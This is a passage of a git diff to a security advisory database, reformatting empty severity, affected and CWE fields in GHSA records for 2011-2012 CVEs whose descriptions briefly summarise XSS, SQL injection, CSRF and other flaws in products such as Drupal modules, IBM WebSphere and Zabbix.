"severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-vx4w-xwhh-229f/GHSA-vx4w-xwhh-229f.json b/advisories/unreviewed/2022/05/GHSA-vx4w-xwhh-229f/GHSA-vx4w-xwhh-229f.json index 902b50420e5..ec43dd20a3d 100644 --- a/advisories/unreviewed/2022/05/GHSA-vx4w-xwhh-229f/GHSA-vx4w-xwhh-229f.json +++ b/advisories/unreviewed/2022/05/GHSA-vx4w-xwhh-229f/GHSA-vx4w-xwhh-229f.json @@ -7,12 +7,8 @@ "CVE-2012-3373" ], "details": "Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.21 and 1.5.x before 1.5.8 allows remote attackers to inject arbitrary web script or HTML via vectors involving a %00 sequence in an Ajax link URL associated with a Wicket app.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-w2fg-wg6f-hgqg/GHSA-w2fg-wg6f-hgqg.json b/advisories/unreviewed/2022/05/GHSA-w2fg-wg6f-hgqg/GHSA-w2fg-wg6f-hgqg.json index 7f2a4e6e63d..1ed2374233e 100644 --- a/advisories/unreviewed/2022/05/GHSA-w2fg-wg6f-hgqg/GHSA-w2fg-wg6f-hgqg.json +++ b/advisories/unreviewed/2022/05/GHSA-w2fg-wg6f-hgqg/GHSA-w2fg-wg6f-hgqg.json @@ -7,12 +7,8 @@ "CVE-2012-2159" ], "details": "Open redirect vulnerability in IBM Eclipse Help System (IEHS), as used in IBM Security AppScan Source 7.x and 8.x before 8.6 and IBM SPSS Data Collection Developer Library 6.0 and 6.0.1, allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-w2r7-85q4-6mgr/GHSA-w2r7-85q4-6mgr.json b/advisories/unreviewed/2022/05/GHSA-w2r7-85q4-6mgr/GHSA-w2r7-85q4-6mgr.json index e2032a977e0..822a8c5dfe8 100644 --- a/advisories/unreviewed/2022/05/GHSA-w2r7-85q4-6mgr/GHSA-w2r7-85q4-6mgr.json +++ b/advisories/unreviewed/2022/05/GHSA-w2r7-85q4-6mgr/GHSA-w2r7-85q4-6mgr.json @@ -7,12 +7,8 @@ "CVE-2012-3298" ], "details": "Unspecified vulnerability in the REST services framework in IBM WebSphere Commerce 7.0 Feature Pack 4 allows remote attackers to obtain sensitive information, modify data, or cause a denial of service via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-w3gc-6887-36p6/GHSA-w3gc-6887-36p6.json b/advisories/unreviewed/2022/05/GHSA-w3gc-6887-36p6/GHSA-w3gc-6887-36p6.json index d654e7ba128..55619bee0cb 100644 --- a/advisories/unreviewed/2022/05/GHSA-w3gc-6887-36p6/GHSA-w3gc-6887-36p6.json +++ b/advisories/unreviewed/2022/05/GHSA-w3gc-6887-36p6/GHSA-w3gc-6887-36p6.json @@ -7,12 +7,8 @@ "CVE-2012-3577" ], "details": "Unrestricted file upload vulnerability in doupload.php in the Nmedia Member Conversation plugin before 1.4 for WordPress allows remote attackers to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in wp-content/uploads/user_uploads.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-w3j6-q99g-c8w8/GHSA-w3j6-q99g-c8w8.json b/advisories/unreviewed/2022/05/GHSA-w3j6-q99g-c8w8/GHSA-w3j6-q99g-c8w8.json index 00aaa2c4e0a..6ece5dde4b9 100644 --- a/advisories/unreviewed/2022/05/GHSA-w3j6-q99g-c8w8/GHSA-w3j6-q99g-c8w8.json +++ b/advisories/unreviewed/2022/05/GHSA-w3j6-q99g-c8w8/GHSA-w3j6-q99g-c8w8.json @@ -7,12 +7,8 @@ "CVE-2011-5194" ], "details": "Cross-site scripting (XSS) vulnerability in vendors/samswhois/samswhois.inc.php in the Whois Search plugin before 1.4.2.3 for WordPress allows remote attackers to inject arbitrary web script or HTML via the domain parameter, a different vulnerability than CVE-2011-5193.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-w482-44xc-42x9/GHSA-w482-44xc-42x9.json b/advisories/unreviewed/2022/05/GHSA-w482-44xc-42x9/GHSA-w482-44xc-42x9.json index a985c0719c3..b6a6d9914fe 100644 --- a/advisories/unreviewed/2022/05/GHSA-w482-44xc-42x9/GHSA-w482-44xc-42x9.json +++ b/advisories/unreviewed/2022/05/GHSA-w482-44xc-42x9/GHSA-w482-44xc-42x9.json @@ -7,12 +7,8 @@ "CVE-2012-1730" ], "details": "Unspecified vulnerability in the Oracle Application Object Library component in Oracle E-Business Suite 11.5.10.2, 12.0.6, and 12.1.3 allows remote attackers to affect integrity via unknown vectors related to Password Management.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-w488-h6xh-7wj6/GHSA-w488-h6xh-7wj6.json b/advisories/unreviewed/2022/05/GHSA-w488-h6xh-7wj6/GHSA-w488-h6xh-7wj6.json index d848c81a57a..f0e5f1d97da 100644 --- a/advisories/unreviewed/2022/05/GHSA-w488-h6xh-7wj6/GHSA-w488-h6xh-7wj6.json +++ b/advisories/unreviewed/2022/05/GHSA-w488-h6xh-7wj6/GHSA-w488-h6xh-7wj6.json @@ -7,12 +7,8 @@ "CVE-2012-2907" ], "details": "Cross-site scripting (XSS) vulnerability in the aberdeen_breadcrumb function in template.php in the Aberdeen theme 6.x-1.x before 6.x-1.11 for Drupal, when set to append the content title to the breadcrumb, allows remote attackers to inject arbitrary web script or HTML via the content title in a breadcrumb.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-w7w3-wc7m-wc88/GHSA-w7w3-wc7m-wc88.json b/advisories/unreviewed/2022/05/GHSA-w7w3-wc7m-wc88/GHSA-w7w3-wc7m-wc88.json index 76d5714b33e..fd6336307ee 100644 --- a/advisories/unreviewed/2022/05/GHSA-w7w3-wc7m-wc88/GHSA-w7w3-wc7m-wc88.json +++ b/advisories/unreviewed/2022/05/GHSA-w7w3-wc7m-wc88/GHSA-w7w3-wc7m-wc88.json @@ -7,12 +7,8 @@ "CVE-2012-2591" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in EmailArchitect Email Server 10.0 and 10.0.0.3 allow remote attackers to inject arbitrary web script or HTML via the (1) From or (2) Date field in an email.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-w8rf-9fp6-x8cj/GHSA-w8rf-9fp6-x8cj.json b/advisories/unreviewed/2022/05/GHSA-w8rf-9fp6-x8cj/GHSA-w8rf-9fp6-x8cj.json index 5cdaff1237d..6e0abfcf8bc 100644 --- a/advisories/unreviewed/2022/05/GHSA-w8rf-9fp6-x8cj/GHSA-w8rf-9fp6-x8cj.json +++ b/advisories/unreviewed/2022/05/GHSA-w8rf-9fp6-x8cj/GHSA-w8rf-9fp6-x8cj.json @@ -7,12 +7,8 @@ "CVE-2012-2077" ], "details": "Cross-site request forgery (CSRF) vulnerability in the ShareThis module 7.x-2.x before 7.x-2.3 for Drupal allows remote attackers to hijack the authentication of users with administer sharethis permissions via unknown vectors \"outside of the Form API.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-w8xh-986v-xwgh/GHSA-w8xh-986v-xwgh.json b/advisories/unreviewed/2022/05/GHSA-w8xh-986v-xwgh/GHSA-w8xh-986v-xwgh.json index 600329a9f43..307bf1626f0 100644 --- a/advisories/unreviewed/2022/05/GHSA-w8xh-986v-xwgh/GHSA-w8xh-986v-xwgh.json +++ b/advisories/unreviewed/2022/05/GHSA-w8xh-986v-xwgh/GHSA-w8xh-986v-xwgh.json @@ -7,12 +7,8 @@ "CVE-2012-3435" ], "details": "SQL injection vulnerability in frontends/php/popup_bitem.php in Zabbix 1.8.15rc1 and earlier, and 2.x before 2.0.2rc1, allows remote attackers to execute arbitrary SQL commands via the itemid parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-w953-754p-r2cj/GHSA-w953-754p-r2cj.json b/advisories/unreviewed/2022/05/GHSA-w953-754p-r2cj/GHSA-w953-754p-r2cj.json index 359e57d3393..112261dc670 100644 --- a/advisories/unreviewed/2022/05/GHSA-w953-754p-r2cj/GHSA-w953-754p-r2cj.json +++ b/advisories/unreviewed/2022/05/GHSA-w953-754p-r2cj/GHSA-w953-754p-r2cj.json @@ -7,12 +7,8 @@ "CVE-2012-3791" ], "details": "Multiple SQL injection vulnerabilities in Simple Web Content Management System 1.1 allow remote attackers to execute arbitrary SQL commands via the id parameter to (1) item_delete.php, (2) item_status.php, (3) item_detail.php, (4) item_modify.php, or (5) item_position.php in admin/; or (6) status parameter to admin/item_status.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-wc75-8qh7-7x89/GHSA-wc75-8qh7-7x89.json b/advisories/unreviewed/2022/05/GHSA-wc75-8qh7-7x89/GHSA-wc75-8qh7-7x89.json index 96e0b329748..2e2b9578b91 100644 --- a/advisories/unreviewed/2022/05/GHSA-wc75-8qh7-7x89/GHSA-wc75-8qh7-7x89.json +++ b/advisories/unreviewed/2022/05/GHSA-wc75-8qh7-7x89/GHSA-wc75-8qh7-7x89.json @@ -7,12 +7,8 @@ "CVE-2012-1428" ], "details": "The TAR file parser in Quick Heal (aka Cat QuickHeal) 11.00, Norman Antivirus 6.06.12, and Sophos Anti-Virus 4.61.0 allows remote attackers to bypass malware detection via a POSIX TAR file with a \\4a\\46\\49\\46 character sequence at a certain location. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-wccq-42q9-qggj/GHSA-wccq-42q9-qggj.json b/advisories/unreviewed/2022/05/GHSA-wccq-42q9-qggj/GHSA-wccq-42q9-qggj.json index 53a4bd9dfe5..126a32fab48 100644 --- a/advisories/unreviewed/2022/05/GHSA-wccq-42q9-qggj/GHSA-wccq-42q9-qggj.json +++ b/advisories/unreviewed/2022/05/GHSA-wccq-42q9-qggj/GHSA-wccq-42q9-qggj.json @@ -7,12 +7,8 @@ "CVE-2012-3294" ], "details": "Multiple cross-site request forgery (CSRF) vulnerabilities in the Web Gateway component in IBM WebSphere MQ File Transfer Edition 7.0.4 and earlier, and WebSphere MQ - Managed File Transfer 7.5, allow remote attackers to hijack the authentication of arbitrary users for requests that (1) add user accounts via the /wmqfteconsole/Filespaces URI, (2) modify permissions via the /wmqfteconsole/FileSpacePermisssions URI, or (3) add MQ Message Descriptor (MQMD) user accounts via the /wmqfteconsole/UploadUsers URI.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-wcq8-87g7-jxwc/GHSA-wcq8-87g7-jxwc.json b/advisories/unreviewed/2022/05/GHSA-wcq8-87g7-jxwc/GHSA-wcq8-87g7-jxwc.json index 0c31d6e6d55..aad70bd2326 100644 --- a/advisories/unreviewed/2022/05/GHSA-wcq8-87g7-jxwc/GHSA-wcq8-87g7-jxwc.json +++ b/advisories/unreviewed/2022/05/GHSA-wcq8-87g7-jxwc/GHSA-wcq8-87g7-jxwc.json @@ -7,12 +7,8 @@ "CVE-2012-3834" ], "details": "SQL injection vulnerability in forensics/base_qry_main.php in AlienVault Open Source Security Information Management (OSSIM) 3.1 allows remote authenticated users to execute arbitrary SQL commands via the time[0][0] parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-wcv9-8rh4-59p4/GHSA-wcv9-8rh4-59p4.json b/advisories/unreviewed/2022/05/GHSA-wcv9-8rh4-59p4/GHSA-wcv9-8rh4-59p4.json index 537e17e3c27..c65da52ad92 100644 --- a/advisories/unreviewed/2022/05/GHSA-wcv9-8rh4-59p4/GHSA-wcv9-8rh4-59p4.json +++ b/advisories/unreviewed/2022/05/GHSA-wcv9-8rh4-59p4/GHSA-wcv9-8rh4-59p4.json @@ -7,12 +7,8 @@ "CVE-2012-3153" ], "details": "Unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4, 11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Servlet. NOTE: the previous information is from the October 2012 CPU. Oracle has not commented on claims from the original researcher that the PARSEQUERY function allows remote attackers to obtain database credentials via reports/rwservlet/parsequery, and that this issue occurs in earlier versions. NOTE: this can be leveraged with CVE-2012-3152 to execute arbitrary code by uploading a .jsp file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-wf9r-j7xh-v25m/GHSA-wf9r-j7xh-v25m.json b/advisories/unreviewed/2022/05/GHSA-wf9r-j7xh-v25m/GHSA-wf9r-j7xh-v25m.json index 41cc2355d93..ded91c3e733 100644 --- a/advisories/unreviewed/2022/05/GHSA-wf9r-j7xh-v25m/GHSA-wf9r-j7xh-v25m.json +++ b/advisories/unreviewed/2022/05/GHSA-wf9r-j7xh-v25m/GHSA-wf9r-j7xh-v25m.json @@ -7,12 +7,8 @@ "CVE-2012-1076" ], "details": "Cross-site scripting (XSS) vulnerability in the Documents download (rtg_files) extension before 1.5.2 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-wfcv-qp56-52h5/GHSA-wfcv-qp56-52h5.json b/advisories/unreviewed/2022/05/GHSA-wfcv-qp56-52h5/GHSA-wfcv-qp56-52h5.json index f73b946ab8a..fcef1f0d9ec 100644 --- a/advisories/unreviewed/2022/05/GHSA-wfcv-qp56-52h5/GHSA-wfcv-qp56-52h5.json +++ b/advisories/unreviewed/2022/05/GHSA-wfcv-qp56-52h5/GHSA-wfcv-qp56-52h5.json @@ -7,12 +7,8 @@ "CVE-2012-1758" ], "details": "Unspecified vulnerability in the Oracle AutoVue component in Oracle Supply Chain Products Suite 20.0.2 and 20.1 allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-1759.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-wfm8-qgj5-39hf/GHSA-wfm8-qgj5-39hf.json b/advisories/unreviewed/2022/05/GHSA-wfm8-qgj5-39hf/GHSA-wfm8-qgj5-39hf.json index 815f810a7f7..c6367cf76d0 100644 --- a/advisories/unreviewed/2022/05/GHSA-wfm8-qgj5-39hf/GHSA-wfm8-qgj5-39hf.json +++ b/advisories/unreviewed/2022/05/GHSA-wfm8-qgj5-39hf/GHSA-wfm8-qgj5-39hf.json @@ -7,12 +7,8 @@ "CVE-2012-3734" ], "details": "Office Viewer in Apple iOS before 6 writes cleartext document data to a temporary file, which might allow local users to bypass a document's intended (1) Data Protection level or (2) encryption state by reading the temporary content.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-wfp3-hjq5-f86q/GHSA-wfp3-hjq5-f86q.json b/advisories/unreviewed/2022/05/GHSA-wfp3-hjq5-f86q/GHSA-wfp3-hjq5-f86q.json index 6df1fc4bdeb..4c393dd755d 100644 --- a/advisories/unreviewed/2022/05/GHSA-wfp3-hjq5-f86q/GHSA-wfp3-hjq5-f86q.json +++ b/advisories/unreviewed/2022/05/GHSA-wfp3-hjq5-f86q/GHSA-wfp3-hjq5-f86q.json @@ -7,12 +7,8 @@ "CVE-2012-1056" ], "details": "The Forward module 6.x-1.x before 6.x-1.21 and 7.x-1.x before 7.x-1.3 for Drupal does not properly enforce permissions for (1) Recent forwards, (2) Most forwarded, or (3) Dynamic blocks, which allows remote attackers to obtain node titles via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-wg9c-cg8m-pxx8/GHSA-wg9c-cg8m-pxx8.json b/advisories/unreviewed/2022/05/GHSA-wg9c-cg8m-pxx8/GHSA-wg9c-cg8m-pxx8.json index 7a5291347b7..d0aff890e98 100644 --- a/advisories/unreviewed/2022/05/GHSA-wg9c-cg8m-pxx8/GHSA-wg9c-cg8m-pxx8.json +++ b/advisories/unreviewed/2022/05/GHSA-wg9c-cg8m-pxx8/GHSA-wg9c-cg8m-pxx8.json @@ -7,12 +7,8 @@ "CVE-2012-1210" ], "details": "SQL injection vulnerability in pfile/file.php in Powie pFile 1.02 allows remote attackers to execute arbitrary SQL commands via the id parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-wgjh-54vp-2362/GHSA-wgjh-54vp-2362.json b/advisories/unreviewed/2022/05/GHSA-wgjh-54vp-2362/GHSA-wgjh-54vp-2362.json index 2e023d7b49c..1e1033be9bc 100644 --- a/advisories/unreviewed/2022/05/GHSA-wgjh-54vp-2362/GHSA-wgjh-54vp-2362.json +++ b/advisories/unreviewed/2022/05/GHSA-wgjh-54vp-2362/GHSA-wgjh-54vp-2362.json @@ -7,12 +7,8 @@ "CVE-2012-3327" ], "details": "Cross-site scripting (XSS) vulnerability in IBM Maximo Asset Management 6.2 through 7.5, Maximo Asset Management Essentials 6.2 through 7.5, Tivoli Asset Management for IT 6.2 through 7.2, Tivoli Service Request Manager 7.1 and 7.2, Maximo Service Desk 6.2, Change and Configuration Management Database (CCMDB) 7.1 and 7.2, and SmartCloud Control Desk 7.5 allows remote attackers to inject arbitrary web script or HTML via vectors related to a login action.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-wh5q-mrqr-2xfq/GHSA-wh5q-mrqr-2xfq.json b/advisories/unreviewed/2022/05/GHSA-wh5q-mrqr-2xfq/GHSA-wh5q-mrqr-2xfq.json index 4f2f7025095..4b8410878ad 100644 --- a/advisories/unreviewed/2022/05/GHSA-wh5q-mrqr-2xfq/GHSA-wh5q-mrqr-2xfq.json +++ b/advisories/unreviewed/2022/05/GHSA-wh5q-mrqr-2xfq/GHSA-wh5q-mrqr-2xfq.json @@ -7,12 +7,8 @@ "CVE-2012-3800" ], "details": "Cross-site scripting (XSS) vulnerability in og.js in the Organic Groups (OG) module 6.x-2.x before 6.x-2.4 for Drupal, when used with the Vertical Tabs module, allows remote authenticated users to inject arbitrary web script or HTML via vectors related the group title.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-wj34-2mf5-qpx4/GHSA-wj34-2mf5-qpx4.json b/advisories/unreviewed/2022/05/GHSA-wj34-2mf5-qpx4/GHSA-wj34-2mf5-qpx4.json index 61e325d26fe..be8b961dc31 100644 --- a/advisories/unreviewed/2022/05/GHSA-wj34-2mf5-qpx4/GHSA-wj34-2mf5-qpx4.json +++ b/advisories/unreviewed/2022/05/GHSA-wj34-2mf5-qpx4/GHSA-wj34-2mf5-qpx4.json @@ -7,12 +7,8 @@ "CVE-2012-3330" ], "details": "The proxy server in IBM WebSphere Application Server 7.0 before 7.0.0.27, 8.0 before 8.0.0.5, and 8.5 before 8.5.0.1, and WebSphere Virtual Enterprise, allows remote attackers to cause a denial of service (daemon outage) via a crafted request.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-wm6w-5h88-p758/GHSA-wm6w-5h88-p758.json b/advisories/unreviewed/2022/05/GHSA-wm6w-5h88-p758/GHSA-wm6w-5h88-p758.json index b1ffaa649e4..14bbee73eaf 100644 --- a/advisories/unreviewed/2022/05/GHSA-wm6w-5h88-p758/GHSA-wm6w-5h88-p758.json +++ b/advisories/unreviewed/2022/05/GHSA-wm6w-5h88-p758/GHSA-wm6w-5h88-p758.json @@ -7,12 +7,8 @@ "CVE-2012-3714" ], "details": "The Form Autofill feature in Apple Safari before 6.0.1 does not restrict the filled fields to the set of fields contained in an Autofill popover, which allows remote attackers to obtain the Me card from an Address Book via a crafted web site.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-wmc4-xq33-mvv6/GHSA-wmc4-xq33-mvv6.json b/advisories/unreviewed/2022/05/GHSA-wmc4-xq33-mvv6/GHSA-wmc4-xq33-mvv6.json index 5069ce01509..9385e6780b9 100644 --- a/advisories/unreviewed/2022/05/GHSA-wmc4-xq33-mvv6/GHSA-wmc4-xq33-mvv6.json +++ b/advisories/unreviewed/2022/05/GHSA-wmc4-xq33-mvv6/GHSA-wmc4-xq33-mvv6.json @@ -7,12 +7,8 @@ "CVE-2012-2911" ], "details": "Cross-site scripting (XSS) vulnerability in backupDB.php in SiliSoftware backupDB() 1.2.7a allows remote attackers to inject arbitrary web script or HTML via the onlyDB parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-wmx8-5mpf-g7gj/GHSA-wmx8-5mpf-g7gj.json b/advisories/unreviewed/2022/05/GHSA-wmx8-5mpf-g7gj/GHSA-wmx8-5mpf-g7gj.json index c2bbb31b67f..6946ed0843b 100644 --- a/advisories/unreviewed/2022/05/GHSA-wmx8-5mpf-g7gj/GHSA-wmx8-5mpf-g7gj.json +++ b/advisories/unreviewed/2022/05/GHSA-wmx8-5mpf-g7gj/GHSA-wmx8-5mpf-g7gj.json @@ -7,12 +7,8 @@ "CVE-2012-1660" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in components/select.inc in the Webform module 6.x-3.x before 6.x-3.17 and 7.x-3.x before 7.x-3.17 for Drupal, when the \"Select (or other)\" module is enabled, allow remote authenticated users with the create webform content permission to inject arbitrary web script or HTML via vectors related to (1) checkboxes or (2) radios.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-wp5h-vrr5-h49g/GHSA-wp5h-vrr5-h49g.json b/advisories/unreviewed/2022/05/GHSA-wp5h-vrr5-h49g/GHSA-wp5h-vrr5-h49g.json index 99d85038ce0..986afb46f13 100644 --- a/advisories/unreviewed/2022/05/GHSA-wp5h-vrr5-h49g/GHSA-wp5h-vrr5-h49g.json +++ b/advisories/unreviewed/2022/05/GHSA-wp5h-vrr5-h49g/GHSA-wp5h-vrr5-h49g.json @@ -7,12 +7,8 @@ "CVE-2012-2184" ], "details": "Session fixation vulnerability in IBM Maximo Asset Management 7.1 through 7.5, as used in SmartCloud Control Desk, Tivoli Asset Management for IT, Tivoli Service Request Manager, Maximo Service Desk, and Change and Configuration Management Database (CCMDB), allows remote attackers to hijack web sessions via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-wp7g-r4mw-j38q/GHSA-wp7g-r4mw-j38q.json b/advisories/unreviewed/2022/05/GHSA-wp7g-r4mw-j38q/GHSA-wp7g-r4mw-j38q.json index babad4e084d..0b2b7788b04 100644 --- a/advisories/unreviewed/2022/05/GHSA-wp7g-r4mw-j38q/GHSA-wp7g-r4mw-j38q.json +++ b/advisories/unreviewed/2022/05/GHSA-wp7g-r4mw-j38q/GHSA-wp7g-r4mw-j38q.json @@ -7,12 +7,8 @@ "CVE-2012-2057" ], "details": "Cross-site request forgery (CSRF) vulnerability in the Ubercart Bulk Stock Updater module for Drupal allows remote attackers to hijack the authentication of unspecified victims via unknown vectors related to formAPI.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-wp9g-5pp9-hxcm/GHSA-wp9g-5pp9-hxcm.json b/advisories/unreviewed/2022/05/GHSA-wp9g-5pp9-hxcm/GHSA-wp9g-5pp9-hxcm.json index 8550b3e43d7..253d2bf0663 100644 --- a/advisories/unreviewed/2022/05/GHSA-wp9g-5pp9-hxcm/GHSA-wp9g-5pp9-hxcm.json +++ b/advisories/unreviewed/2022/05/GHSA-wp9g-5pp9-hxcm/GHSA-wp9g-5pp9-hxcm.json @@ -7,12 +7,8 @@ "CVE-2012-2103" ], "details": "The qmailscan plugin for Munin 1.4.5 allows local users to overwrite arbitrary files via a symlink attack on temporary files with predictable names.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-wpgm-86gj-6wrw/GHSA-wpgm-86gj-6wrw.json b/advisories/unreviewed/2022/05/GHSA-wpgm-86gj-6wrw/GHSA-wpgm-86gj-6wrw.json index 373162934e5..22a29336922 100644 --- a/advisories/unreviewed/2022/05/GHSA-wpgm-86gj-6wrw/GHSA-wpgm-86gj-6wrw.json +++ b/advisories/unreviewed/2022/05/GHSA-wpgm-86gj-6wrw/GHSA-wpgm-86gj-6wrw.json @@ -7,12 +7,8 @@ "CVE-2012-2716" ], "details": "Cross-site request forgery (CSRF) vulnerability in the Comment Moderation module 6.x-1.x before 6.x-1.1 for Drupal allows remote attackers to hijack the authentication of administrators for requests that publish comments.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-wprp-q629-mgxj/GHSA-wprp-q629-mgxj.json b/advisories/unreviewed/2022/05/GHSA-wprp-q629-mgxj/GHSA-wprp-q629-mgxj.json index 45664395d31..ec954e92504 100644 --- a/advisories/unreviewed/2022/05/GHSA-wprp-q629-mgxj/GHSA-wprp-q629-mgxj.json +++ b/advisories/unreviewed/2022/05/GHSA-wprp-q629-mgxj/GHSA-wprp-q629-mgxj.json @@ -7,12 +7,8 @@ "CVE-2011-4197" ], "details": "etc/inc/certs.inc in the PKI implementation in pfSense before 2.0.1 creates each X.509 certificate with a true value for the CA basic constraint, which allows remote attackers to create sub-certificates for arbitrary subjects by leveraging the private key.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git 